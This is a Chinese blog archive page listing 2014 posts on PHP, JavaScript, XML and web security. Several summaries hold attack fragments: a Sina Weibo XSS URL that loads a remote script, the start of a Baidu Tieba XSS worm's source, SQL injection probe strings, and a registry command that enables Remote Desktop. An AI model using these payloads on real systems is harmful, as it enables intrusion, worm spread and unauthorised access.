04 2014 档案
Server.MapPath()
摘要:./当前目录/网站主目录../上层目录~/网站虚拟目录如果当前的网站目录为E:\wwwroot应用程序虚拟目录为E:\wwwroot\company浏览的页面路径为E:\wwwroot\company\news\show.asp在show.asp页面中使用Server.MapPath("./")返回...
阅读全文
asp防注入安全问题
摘要:一、古老的绕验证漏洞虽然古老,依然存在于很多小程序之中,比如一些企业网站的后台,简单谈谈。这个漏洞出现在没有对接受的变量进行过滤,带入数据库判断查询时,造成SQL语句的逻辑问题。例如以下代码存在问题:username=request("username")password=request("pass...
阅读全文
二叉树
摘要:复习下二叉树,创建二叉树,分别以先序,中序,后续三种遍历访问二叉树,输出二叉树的叶子节点及叶子节点的个数,并输出二叉树的高度#include#include#include#includeusing namespace std;typedef struct BiTNode{ char data; s...
阅读全文
哈希树
摘要:我们选择质数分辨算法来建立一棵哈希树。选择从2开始的连续质数来建立一个十层的哈希树。第一层结点为根结点,根结点下有2个结点;第二层的每个结点下有3个结点;依此类推,即每层结点的子节点数目为连续的质数。到第十层,每个结点下有29个结点。如下图所示:同一结点中的子结点,从左到右代表不同的余数结果。例如:...
阅读全文
ASP文件操作(FSO)详解
摘要:实例一:写入文件 语法 object.CreateTextFile([要建立的文件],[如存在,是否替代]) 实例二:复制文件 语法 object.CopyFile [复制路经], [粘贴路经][, 如存在,是否替代] 实例三:复制文件夹 语法 object.CopyFolder [复制路经],...
阅读全文
cookie中转注入实战
摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓。很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序。这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡,遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的。我 们知道,一...
阅读全文
一个简单的PHP登录演示(SESSION版 与 COOKIE版)
摘要://==============COOKIE版本的简单登录================if ($_GET[out]){setcookie('id','');setcookie('pw','');echo "";}if ($_POST[name]&&$_POST[password]){setcoo...
阅读全文
web系统之session劫持解决
摘要:session劫持是一种比较复杂的攻击方法。大部分互联网上的电脑多存在被攻击的危险。这是一种劫持tcp协议的方法,所以几乎所有的局域网,都存在被劫持 可能。 两台主机要想进行TCP通信,必须经过一个三次握手的过程。三次握手过程中服务端和客户端一般会协商一个序列号。这个序列号一般是一个长整数。用来标...
阅读全文
CKFinder 1.4.3 任意文件上传漏洞
摘要:CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。 CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传 8090s...
阅读全文
PHP之session相关实例教程与经典代码
摘要:·php 中cookie和session的用法比较·phpmyadmin报错:Cannot start session without errors问题·php中cookie与session应用学习笔记·php.ini中session和cookie有关的配置·php中session一些基础知识·ph...
阅读全文
PHP之cookie相关实例教程与经典代码
摘要:·php 中cookie和session的用法比较·php会话控制cookie与Session会话处理·php中利用cookie实现购物车实例·php中cookie与session应用学习笔记·php setcookie时值为null或空字符串(删除cookie)·php.ini中session和c...
阅读全文
PHP之XML节点追加操作讲解
摘要:问题:最近研究了xml,我想知道,如何用php向已有的xml文档中添加新的节点,比如,xml文档内容如下,并保存为information.xml: 我如果想用php的dom方法再在根节点下添加个新的,我该怎么写啊,求助! php要实现的效果: 解答:例子解答: 't...
阅读全文
$POST数组论证($GET || $COOKIE || $REQUEST 同理)
摘要:我觉得还是有多个$_POST 如果只有一个$_POST,那么,多个人[同时]提交的话就不好处理 或者一个$_POST 时间限制(如同时钟周期)处理(不可能,不然响应没这么快) 或者 一个$_POST处理多个用户(更不可能,次序混乱)
阅读全文
PHP之preg_replace()与ereg_replace()正则匹配比较讲解
摘要:";/*打印: daoyu-shi-ge-hao-hai-zi-5555*///2.对字符串的逆向引用//方法一 $pat = "/(\w+)-(\w+)-(\w+)-(\w+)-(\w+)-(\w+)-(\d+)/i"; $str =preg_replace($pat,"\$1",$str); e...
阅读全文
PHP之mysql_real_escape_string()函数讲解
摘要:定义和用法mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\'"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。语法mysql_real_escape_string(string,co...
阅读全文
浅析白盒审计中的字符编码及SQL注入
摘要:尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。我们...
阅读全文
PHP之list()函数讲解
摘要:定义和用法list() 函数用数组中的元素为一组变量赋值。注意,与 array() 类似,list() 实际上是一种语言结构,不是函数。语法list(var1,var2...)参数描述var1必需。第一个需要赋值的变量。var2可选。可以有多个变量。提示和注释注释:该函数只用于数字索引的数组,且假定...
阅读全文
PHP之implode与explode函数讲解
摘要:implode(PHP 4, PHP 5)implode — 将一个一维数组的值转化为字符串说明 ¶string implode ( string $glue , array $pieces )string implode ( array $pieces )用 glue 将一维数组的值连接为一个字符...
阅读全文
PHP之Error与Logging函数讲解
摘要:PHP Error 和 Logging 简介error 和 logging 函数允许你对错误进行处理和记录。error 函数允许用户定义错误处理规则,并修改记录错误的方式。logging 函数允许用户对应用程序进行日志记录,并把日志消息发送到电子邮件、系统日志或其他的机器。安装error 和 log...
阅读全文
PHP之set_error_handler()函数讲解
摘要:定义和用法set_error_handler() 函数设置用户自定义的错误处理函数。该函数用于创建运行时期间的用户自己的错误处理方法。该函数会返回旧的错误处理程序,若失败,则返回 null。语法set_error_handler(error_function,error_types)参数描述erro...
阅读全文
PHP防止SQL注入与几种正则表达式讲解
摘要:注入漏洞代码和分析代码如下:error number: [$errno],error on line $errline in $errfile; die(); } set_error_handler(customerror,e_error); $getfilter='|(and|or)\\b.+?...
阅读全文
PHP对XML添加节点之appendChild()方法讲解
摘要:问题如下: test 我要在b节点里面添加一个子节点比如说加一个d节点,要实现成 testtest 解决如下:123.xml文件如下:testphp代码如下:load('123.xml');//加载xml文件$b_node = $xml->getElementsByTagName('b');//获...
阅读全文
PHP创建XML文件讲解
摘要:# - # - # adevy001 # 男 # # $doc=new DOMDocument("1.0","gb2312"); #声明文档类型 $doc->formatOutput=true; #设置可以输出操作 #声明根节点,最好一个XML文件...
阅读全文
PHP对XML文件操作类讲解
摘要:dom = new DOMDocument ('1.0','UTF-8'); header ("Content-Type:text/xml"); } //传递普通节点名称,创建节点 function CreateNode ($node) { return $this -> dom -> crea...
阅读全文
PHP对XML文件操作之属性与方法讲解
摘要:DOMDocument相关的内容. 属性: Attributes 存储节点的属性列表(只读) childNodes 存储节点的子节点列表(只读) dataType 返回此节点的数据类型 Definition 以DTD或XML模式给出的节点的定义(只读) Doctype 指定文档类型节点(只读) do...
阅读全文
PHP之SQL防注入代码集合(建站常用)
摘要:SQL防注入代码一'99','name'=>'a'b\'c";','note'=>"a'b'nc#"); } $age = (int)$_GET['age']; $name = quote($_GET['name']); $note = quote($_GET['note']); $sql = "I...
阅读全文
PHP之SQL防注入代码(360提供)
摘要:|||$value){$this->stopattack($key,$value,$this->getfilter);} foreach($_POST as $key=>$value){$this->stopattack($key,$value,$this->postfilter);} fore...
阅读全文
PHP读取xml之cdata讲解
摘要:实例:xss.xml 1 )|(?:[^\w\s]\s*\/>)|(?:>")]]> finds html breaking injections including whitespace attacks 1.使用$result = simplexml_load_file ( 'xss.xml',...
阅读全文
PHP读取xml方法讲解
摘要:一,什么是xml,xml有什么用途 XML(Extensible Markup Language)即可扩展标记语言,它与HTML一样,都是SGML(Standard Generalized Markup Language,标准通用标记语言)。Xml是Internet环境中跨平台的,依赖于内容的...
阅读全文
OWASP
摘要:开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。 开放式Web应用程序安全项目(OWASP)是一个非营...
阅读全文
能"干掉"苹果的中国"黑客"
摘要:他是全球发现苹果漏洞最多的人,他曾穷的住在小黑屋,他经常接到国家安全部门的电话,他差点堵住周鸿祎的路,他是谁?无名英雄我们最终还是没有见到吴石本人,即便他的生意合伙人刘盛(化名)已经应承了帮我们牵线。自打2010年他接受了《福布斯》的专访之后,这个四川男人就再也不愿意让自己曝光。那篇文章其实还算中肯...
阅读全文
Roy Li的学习和成长自传
摘要:我不知道自己是什么时候从哪里来到这个世界上的,也许是石头里蹦出来的,也许是女娲捏出来的,上帝造出来的。上溯到我记忆的最前端,抱着我的好象是一个女人,穿着白衣服,白得象石灰一样的那种。以至于后来我被告之我是妈生的——被另外一个女人生了下来的时候,我一直都不信。3岁的时候会说话了第一句话就是问我妈:“我...
阅读全文
Apache Options Indexes FollowSymLinks之讲解
摘要:禁止显示Apache目录列表-Indexes FollowSymLinks如何修改目录的配置以禁止显示 Apache 目录列表。缺省情况下如果你在浏览器输入地址:http://localhost:8080/如果你的文件根目录里有 index.html,浏览器就会显示 index.html的内容,如果...
阅读全文
windows下创建.htaccess文件之讲解
摘要:如果想在Windows操作系统下新增一个.htaccess 文件实现对页面的rewrite,任你如何右点鼠标或者选文件->新增去新增都不会成功的,Windows都会要求给个文件名称。如果你想通过更改文件名的方法实现,也是不可能的。那么,想要创建.htaccess文件该怎么办呢?1. 打开Window...
阅读全文
.htaccess文件讲解
摘要:.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。1简介概述来说,htacce...
阅读全文
几种通用防注入程序绕过方法之讲解
摘要:0x01 Discuz x2.0防注入防注入原理这里以Discuz最近爆出的一个插件的注入漏洞为例,来详细说明绕过方法。漏洞本身很简单,存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中,代码如下所示123456789101112131...
阅读全文
CDATA
摘要:1DTD中的属性类型全名:character data在标记CDATA下,所有的标记、实体引用都被忽略,而被XML处理程序一视同仁地当做字符数据看待,CDATA的形式如下:CDATA的文本内容中不能出现字符串“]]>”,另外,CDATA不能嵌套。DTD实例:指定类型为CDATA以后就可以在XML中被...
阅读全文
MySQL之重设密码(忘记密码)讲解
摘要:Windows下的实际操作如下: 1.关闭正在运行的MySQL。 2.打开DOS窗口,转到mysql\bin目录。 3.输入mysqld(或mysqld-nt) --skip-grant-tables回车。如果没有出现提示信息,那就对了。 4.再开一个DOS窗口(因为刚才那个DOS窗口已...
阅读全文
mysql之sql语句导入与导出讲解
摘要:导出SQL:mysqldump -u root -p 数据库名 [表名1 表名2] > 输出地址其中表名可选本机测试实例:本机测试结果:-- MySQL dump 10.11---- Host: localhost Database: phpforum-- ---------------------...
阅读全文
NS记录
摘要:NS(Name Server)记录是域名服务器记录,用来指定该域名由哪个DNS服务器来进行解析。1名词简介您注册域名时,总有默认的DNS服务器,每个注册的域名都是由一个DNS域名服务器来进行解析的,DNS服务器NS记录地址一般以以下的形式出现:ns1.domain. comns2.domain. c...
阅读全文
MX记录
摘要:是邮件交换记录,它指向一个邮件服务器,用于电子邮件系统发邮件时根据 收信人的地址后缀来定位邮件服务器。MX记录也叫做邮件路由记录,用户可以将该域名下的邮件服务器指向到自己的mail server上,然后即可自行操控所有的邮箱设置。1概述MX(Mail Exchanger)记录是邮件交换记录,它指向一...
阅读全文
CNAME
摘要:CNAME指别名记录也被称为规范名字。这种记录允许您将多个名字映射到同一台计算机。 通常用于同时提供WWW和MAIL服务的计算机。例如,有一台计算机名为“host.mydomain.com”(A记录)。 它同时提供WWW和MAIL服务,为了便于用户访问服务。可以为该计算机设置两个别名(CNAME):...
阅读全文
openSSL漏洞原理及安全加固
摘要:2014年4月8日晚,互联网爆出了又一重量级安全漏洞,即CVE-2014-0160,通俗来讲就是OpenSSL出现了安全漏洞。说 这个漏洞前,先介绍一下OpenSSL,OpenSSL是一个强大的安全套接字层密码库,很多支付网站等涉及资金交易的平台都用它来做加密工具,比如支付 宝,财付通,各种银行网站...
阅读全文
AS3之正则表达式讲解
摘要:限制输入内容(一)、my_txt.restrict = "A-Z 0-9";仅允许在文本字段中输入大写字符、空格和数字 (二)、my_txt.restrict = "^a-z";包含除小写字母之外的所有字符,如果此时输入大写字母,则会自动被转为大写字母(三)、my_txt.restrict=Stri...
阅读全文
负MARGIN之讲解
摘要:css中的负边距(negative margin)是布局中的一个常用技巧,只要运用得合理常常会有意想不到的效果。很多特殊的css布局方法都依赖于负边距,所以掌握它的用法对于前端的同学来说,那是必须的。负边距在普通文档流中的作用和效果那些没有脱离文档流的元素(指不是浮动元素也不是绝对定位、固定定位的元...
阅读全文
sprytabbedpanels.js库之在页面中插入Tabbed Panels
摘要:向页面加入sprytabbedpanels.js文件.向页面插入SpryTabbedPanels.css 样式文件.为了在你的页面中加入tabbed panels ,请在相应位置加入如下代码在div id="TabbedPanels1"...标签中插入ul class="TabbedPanelsTa...
阅读全文
css之margin && padding讲解
摘要:margin && padding盒子模型:margin是模块与模块的空隙,padding是内容与边框的空隙注:1.margin:边缘、空白2.padding:填充margin:属性描述margin简写属性。在一个声明中设置所有外边距属性。[1]margin-bottom设置元素的下外边距。marg...
阅读全文
html之colspan && rowspan讲解
摘要:1.colspan && rowspan均在td标签中使用2.每个单元格大小一致的前提 nokiacomputer nokiacomputer nokiacomputer nokiacomputer nokiacomputer nokiacomputer效果:colspan属性代码: nokiaco...
阅读全文
html之cellspacing && cellpadding讲解
摘要:单元格间距(表格间距)(cellspacing) -- 代表表格边框与单元格补白的距离,也是单元格补白之间的距离单元格边距(表格填充)(cellpadding) -- 代表单元格外面的一个距离,用于隔开单元格与单元格空间注:1.spacing:间隔、间距2.padding:填充3.二者可以是像素也可...
阅读全文
JavaScript之setcookie()讲解
摘要:function setcookie(name,value){var Days = 30;var exp= new Date();exp.setTime(exp.getTime() + Days*24*60*60*1000);document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();}function getcookie(name){var arr = document.cookie.match(new RegExp("(^| )"+n
阅读全文
Tomcat漏洞说明与安全加固
摘要:Tomcat是Apache软件基金会的一个免费的、开放源码的WEB应用服务器,可以运行在Linux和Windows等多个平台上,由于其性能稳定、扩展性好、免费等特点深受广大用户的喜爱。目前,互联网上绝大多数JAVA WEB应用都运行在Tomcat服务器上。Tomcat作为Web应用的载体,一旦出现安全问题,那么运行在其上的Web应用的安全也无法得到保障,所以研究Tomcat的漏洞与安全性就非常有必要。本文通过实例详细的讲述了关于Tomcat攻防两个方面。笔者首先在攻击者的角度,以一个在渗透测试过程中经常利用的Tomcat漏洞作为实例,来详细描述攻击者是如何利用Tomcat服务器漏洞来入侵网站,
阅读全文
ActionScript基本语法讲解
摘要:var a:int = 3;var b:int = 4;b = 9;trace ("a的值为:"+a);trace ("b的值为:"+b);var x1:Array = new Array(1,2,3);var y1:Array = x1;y1[0] = 4;trace ("a现在的值为:"+x1);trace ("b现在的值为:"+y1);var q:Array = new Array("aaaaa","cccccccc","xxxxxxx");var
阅读全文
2014年03月09日攻击百度贴吧的XSS蠕虫源码
摘要:var n=PageData.user.user_forum_list.info.length;var num=0; var config = { titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8
阅读全文
Samy XSS Worm之源码讲解
摘要:说到Web安全和XSS跨站脚本技术,几乎所有的书都会提到Samy Worm,这是在2005年感染了mySpace社交网络上百万用户的蠕虫。正如Morris蠕虫是互联网第一个蠕虫, Samy Worm则是第一个XSS的蠕虫。因此研究XSS技术最好了解一下这个只要浏览了profile就自动把对方加为好友并列为偶像的代码的实现技术。以下是根据对Samy Worm分析的文章进行的大致翻译:1) Myspace阻塞了大量的tags,实际上他们仅允许,,这些,或者还有少数其他标签如。,,onSomething,href等Javascript元素全都被禁用了。然而,有些浏览器如IE允许在CSS标签中插入j.
阅读全文
新浪微博之XSS蠕虫脚本源码讲解
摘要:主要是因为新浪的广场页面有几个链接对输入参数过滤不严导致的反射性XSS。========================================微博XSS漏洞点 weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.****.com/images/t.js%3e%3c/script%3e?type=update 微博XSS脚本内容(XSS源码)function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject(&quo
阅读全文
JavaScript之match()方法讲解
摘要:定义和用法match() 方法可在字符串内检索指定的值,或找到一个或多个正则表达式的匹配。该方法类似 indexOf() 和 lastIndexOf(),但是它返回指定的值,而不是字符串的位置。语法stringObject.match(searchvalue)stringObject.match(regexp)参数描述searchvalue必需。规定要检索的字符串值。regexp必需。规定要匹配的模式的 RegExp 对象。如果该参数不是 RegExp 对象,则需要首先把它传递给 RegExp 构造函数,将其转换为 RegExp 对象。返回值存放匹配结果的数组。该数组的内容依赖于 regexp
阅读全文
JavaScript之substring()方法讲解
摘要:定义和用法substring() 方法用于提取字符串中介于两个指定下标之间的字符。语法stringObject.substring(start,stop)参数描述start必需。一个非负的整数,规定要提取的子串的第一个字符在 stringObject 中的位置。stop可选。一个非负的整数,比要提取的子串的最后一个字符在 stringObject 中的位置多 1。如果省略该参数,那么返回的子串会一直到字符串的结尾。返回值一个新的字符串,该字符串值包含 stringObject 的一个子字符串,其内容是从 start 处到 stop-1 处的所有字符,其长度为 stop 减 start。说明su
阅读全文
JavaScript之With语句讲解
摘要:有了With 语句,在存取对象属性和方法时就不用重复指定参考对象,在 With 语句块中,凡是 JavaScript 不识别的属性和方法都和该语句块指定的对象有关。With 语句的语法格式如下所示:With (Object){ Statements;}对象指明了当语句组中对象缺省时的参考对象,这里我们用较为熟悉的 Document 对象对 With 语句举例。例如 当使用与 Document 对象有关的 write( )或 writeln( )方法时,往往使用如下形式:document.writeln(”Hello!“)如果需要显示大量数据时,就会多次使用同样的 document.writel
阅读全文
JavaScript之表单验证讲解
摘要:JavaScript 可用来在数据被送往服务器前对 HTML 表单中的这些输入数据进行验证。JavaScript 表单验证JavaScript 可用来在数据被送往服务器前对 HTML 表单中的这些输入数据进行验证。被 JavaScript 验证的这些典型的表单数据有:用户是否已填写表单中的必填项目?用户输入的邮件地址是否合法?用户是否已输入合法的日期?用户是否在数据域 (numeric field) 中输入了文本?必填(或必选)项目下面的函数用来检查用户是否已填写表单中的必填(或必选)项目。假如必填或必选项为空,那么警告框会弹出,并且函数的返回值为 false,否则函数的返回值则为 true(
阅读全文
JavaScript之isNaN()函数讲解
摘要:定义和用法isNaN() 函数用于检查其参数是否是非数字值。语法isNaN(x)参数描述x必需。要检测的值。返回值如果 x 是特殊的非数字值 NaN(或者能被转换为这样的值),返回的值就是 true。如果 x 是其他值,则返回 false。说明isNaN() 函数可用于判断其参数是否是 NaN,该值表示一个非法的数字(比如被 0 除后得到的结果)。如果把 NaN 与任何值(包括其自身)相比得到的结果均是 false,所以要判断某个值是否是 NaN,不能使用 == 或 === 运算符。正因为如此,isNaN() 函数是必需的。提示和注释提示:isNaN() 函数通常用于检测 parseFloat
阅读全文
JavaScript之Throw、Try 、Catch讲解
摘要:try语句测试代码块的错误。catch语句处理错误。throw语句创建自定义错误。错误一定会发生当 JavaScript 引擎执行 JavaScript 代码时,会发生各种错误:可能是语法错误,通常是程序员造成的编码错误或错别字。可能是拼写错误或语言中缺少的功能(可能由于浏览器差异)。可能是由于来自服务器或用户的错误输出而导致的错误。当然,也可能是由于许多其他不可预知的因素。JavaScript 抛出错误当错误发生时,当事情出问题时,JavaScript 引擎通常会停止,并生成一个错误消息。描述这种情况的技术术语是:JavaScript 将抛出一个错误。JavaScript 测试和捕捉try语
阅读全文
p3p之讲解
摘要:P3P是一种被称为个人隐私安全平台项目(the Platform for Privacy Preferences)的标准,能够保护在线隐私权,使Internet冲浪者可以选择在浏览网页时,是否被第三方收集并利用自己的个人信息。如果一个站点不遵守P3P标准的话,那么有关它的Cookies将被自动拒绝,并且P3P还能够自动识破多种Cookies的嵌入方式。p3p是由全球资讯联盟网所开发的。1概念P3P随着Internet的发展,电子商务发展势头也异常迅猛。这种新的贸易方式在带给人们难以想象的便利前提下,也给人们带来了以往现金交易模式下所没有的麻烦——通过网络泄露个人隐私数据。(Platform f
阅读全文
CSRF攻击之原理讲解
摘要:|=——————————————————————=||=————–=[ CSRF攻击原理解析 ]=——————=||=——————————————————————=||=——————-=[ By rayh4c ]=————————=||=————-=[ rayh4c@80sec.com ]=—————=||=——————————————————————=|Author: rayh4c [80sec]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2008-9-210×00. 前言 在Web程序中普通用户一般只在Web界面里
阅读全文
百度Hi之CSRF蠕虫攻击
摘要:漏洞起因:百度是国内最大的中文搜索引擎。同时百度也提供了百度空间、百度贴吧等BLOG社区服务,拥有海量的用户群,号称全球最大中文社区。 80sec发现过百度产品一系列的安全漏洞,其中一些问题得到了有效的修补,但是百度的产品仍然存在很多严重的安全漏洞,利用这些漏洞黑客可以制作Web 蠕虫,影响百度所有的用户。CSRF worm技术分析:一. 百度用户中心短消息功能存在CSRF漏洞 百度用户中心短消息功能和百度空间、百度贴吧等产品相互关联,用户可以给指定百度ID用户发送短消息,在百度空间用互为好友的情况下,发送短消息将没有任何限制,同时由于百度程序员在实现短消息功能时使用了$_REQUEST类变量
阅读全文
Portlet之讲解
摘要:Portlet在Web门户上管理和显示的可插拔的用户界面组件。Portlet产生可以聚合到门户页面中的标记语言代码的片段,如HTML,XML等。通常,根据桌面隐喻,一个门户页面显示为一组互相不重叠的portlet窗口,其中每一个portlet窗口显示一个portlet。因此,可以说一个(或一组)portlet就像一个在门户网站上运行的基于Web的应用程序。 Portlet应用程序的一些例子包括电子邮件,天气预报,论坛和新闻等。Portlet标准的目的是使开发人员开发出的portlet可以插入到任何支持该标准的门户网站。标准远程Portlet的Web服务(Web Services for Rem
阅读全文
try-catch语句讲解
摘要:try-catch 语句由一个 try 块后跟一个或多个 catch 子句构成,这些子句指定不同的异常处理程序。 引发异常时,公共语言运行时 (CLR) 会查找处理此异常的 catch 语句。 如果当前执行的方法不包含这样的 catch 块,则 CLR 会查看调用当前方法的方法,然后会遍历调用堆栈。 如果找不到 catch 块,则 CLR 会向用户显示一条有关未经处理的异常的消息并停止执行程序。 try 块包含可能导致异常的保护代码。 该块一直执行到引发异常或成功完成为止。 例如,下列强制转换 null 对象的尝试引发 NullReferenceException 异常:object o2..
阅读全文
unset之讲解
摘要:unset(PHP 4, PHP 5)unset — 释放给定的变量说明 ¶void unset ( mixed $var [, mixed $... ] )unset() 销毁指定的变量。unset() 在函数中的行为会依赖于想要销毁的变量的类型而有所不同。如果在函数中 unset() 一个全局变量,则只是局部变量被销毁,而在调用环境中的变量将保持调用 unset() 之前一样的值。 以上例程会输出:bar如果您想在函数中 unset() 一个全局变量,可使用 $GLOBALS 数组来实现: 如果在函数中 unset() 一个通过引用传...
阅读全文
JsUnit && JUnit之讲解
摘要:首先我们定义我们的函数 这里以最简单的加减乘除四个方法来进行测试建立我们的js文件myjs.jsJs代码 functionadd(num1,num2){returnnum1+num2;}functionminus(num1,num2){returnnum1-num2;}functionmultiply(num1,num2){returnnum1*num2;}functiondivide(num1,num2){returnnum1/num2;}建立我们的测试用例,mytest1.html我们将建立四个测试方法,jsUnit的测试方法必须以test开头。下面我们对myjs.js中的加减乘除四个函数
阅读全文
JavaScript之四种继承方式讲解
摘要:在Javascript中,所有开发者定义的类都可以作为基类,但出于安全性考虑,本地类和宿主类不能作为基类,这样可以防止公用访问编译过的浏览器级的代码,因为这些代码可以被用于恶意攻击。 选定基类后,就可以创建它的子类了。是否使用基类完全由你决定。有时,你可能想创建一个不能直接使用的基类,它只是用于给子类提供通用的函数。在这种情况下,基类被看作抽象类。 创建的子类将继承超类的所有属性和方法,包括构造函数及方法的实现。在Javascript中,所有方法和属性都是公用的,因此子类可直接访问这些方法。子类还可添加超类中没有的新属性和方法,也可以覆盖超类中的属性和方法。 这里列出了四种方法来实现继承机..
阅读全文
JavaScript之arguments对象讲解
摘要:javascript的arguments对象类似于PHP的extract()函数实现。在不确定函数参数个数的情况下,可以通过arguments访问参数,并以索引0为起始。[javascript] view plaincopyfunctionsayHi(){alert(arguments[0]);}sayHi('Helloworld!');//弹窗helloworld!functionhowManyArgs(){alert(arguments.length);}howManyArgs("string",45);//输出"2"howManyA
阅读全文
JavaScript之工厂方式 构造函数方式 原型方式讲解
摘要:一、工厂方式可以为一个对象,创建多个实例。[javascript] view plaincopyvaroCar=newObject;oCar.color="red";oCar.doors=4;oCar.mpg=23;oCar.showColor=function(){alert(this.color);}上面的代码,创建car对象,并赋予属性和方法。执行代码后就可以使用对象,问题是我们经常需要重复、创建多个实例。解决此问题的方法是:创建能够返回特定类型的对象的工厂函数。[javascript] view plaincopyfunctioncreateCar(){varoTe
阅读全文
JavaScript之常用方法讲解
摘要:1.indexOf()定义和用法indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。语法stringObject.indexOf(searchvalue,fromindex)参数描述searchvalue必需。规定需检索的字符串值。fromindex可选的整数参数。规定在字符串中开始检索的位置。它的合法取值是 0 到 stringObject.length - 1。如省略该参数,则将从字符串的首字符开始检索。说明该方法将从头到尾地检索字符串 stringObject,看它是否含有子串 searchvalue。开始检索的位置在字符串的 fromindex 处或字符串的开头(
阅读全文
JavaScript之引用类型讲解
摘要:Object类型 Object类型是JavaScript中使用最多的一种类型。虽然Object的实例不具备多少功能,但对于在应用程序中存储和传输数据而言,它确实是非常理想的选择。 创建Object实例的方式有两种,第一种是使用new操作符后跟Object构造函数。 var person = new Object(); person.name = "tt"; person.age = 12; 另一种方式是使用对象字面量表示法。 var person = { name : 'tt', age : 12 } 另外,使用对象字面量语法时...
阅读全文
JavaScript之数据类型讲解
摘要:JavaScript中有5种简单数据类型(也称为基本数据类型):Undefined、Null、Boolean、Number和String。还有1种复杂数据类型——Object,Object本质上是由一组无序的名值对组成的。 typeof操作符 介于JavaScript是松散类型的,因此需要有一种手段来检测给定变量的数据类型——typeof就是负责提供者方面信息的操作符。对一个值使用typeof操作符可能返回下列某个字符串: ●"undefined"——如果这个值未定义; ● "boolean"——如果这个值是布尔值; ● "string&quo
阅读全文
JavaScript之Cookie讲解
摘要:什么是 Cookie “cookie 是存储于访问者的计算机中的变量。每当同一台计算机通过浏览器请求某个页面时,就会发送这个 cookie。你可以使用 JavaScript 来创建和取回 cookie 的值。” -w3school cookie 是访问过的网站创建的文件,用于存储浏览信息,例如个人资料信息。 从JavaScript的角度看,cookie 就是一些字符串信息。这些信息存放在客户端的计算机中,用于客户端计算机与服务器之间传递信息。 在JavaScript中可以通过 document.cookie 来读取或设置这些信息。由于 cookie 多用在客户端和服务端之间进行通信...
阅读全文
__cdecl __stdcall __fastcall之函数调用约定讲解
摘要:首先讲解一下栈帧的概念:从逻辑上讲,栈帧就是一个函数执行的环境:函数参数、函数的局部变量、函数执行完后返回到哪里等等。实现上有硬件方式和软件方式(有些体系不支持硬件栈)首先应该明白,栈是从高地址向低地址延伸的。每个函数的每次调用,都有它自己独立的一个栈帧,这个栈帧中维持着所需要的各种信息。寄存器ebp指向当前的栈帧的底部(高地址),寄存器esp指向当前的栈帧的顶部(低地址)。注意:EBP指向当前位于系统栈最上边一个栈帧的底部,而不是系统栈的底部。严格说来,“栈帧底部”和“栈底”是不同的概念;ESP所指的栈帧顶部和系统栈的顶部是同一个位置。三者区别一览表:__stdcall__cdecl__fa
阅读全文
xp/2003开关3389指令
摘要:开启3389:@echo offtitle 开启3389clsrem 开启3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nulecho.echo 提示你:3389已经开启关闭3389:echo rem 关闭3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Term
阅读全文
SQL注入测试用例
摘要://看看是什么权限的and1=(SelectIS_MEMBER('db_owner'))Andchar(124)%2BCast(IS_MEMBER('db_owner')asvarchar(1))%2Bchar(124)=1;--//检测是否有读取某数据库的权限and1=(SelectHAS_DBACCESS('master'))Andchar(124)%2BCast(HAS_DBACCESS('master')asvarchar(1))%2Bchar(124)=1--数字类型andchar(124)%2Buser%2Bchar(
阅读全文
维吉尼亚密码破译
摘要:维吉尼亚密码以破译复杂、工作烦琐而闻名,令众多破译者望而却步。但是破译的方法还是有的,由于工作量较大,所以一般借助一些破解工具。由于不是一次一密乱码本作为的密钥,所以密钥的长度都是有限的,所以当密文越长时,我们破解出密码的可能性就越大。破解方法以下题为例:cgrpfrvanxsnycznbjqana首先假设密钥的长度,我们从2开始(如果密钥长度是1的话,维吉尼亚密码就变成了恺撒密码了)。假设密钥长为2。以两个字母为一组加上空格:cg rp fr va nx sn yc zn bj qa na再进行恺撒全排:A cg rp fr va nx sn yc zn bj qa naZ dh sq gs
阅读全文
可执行文件(ELF)格式之讲解
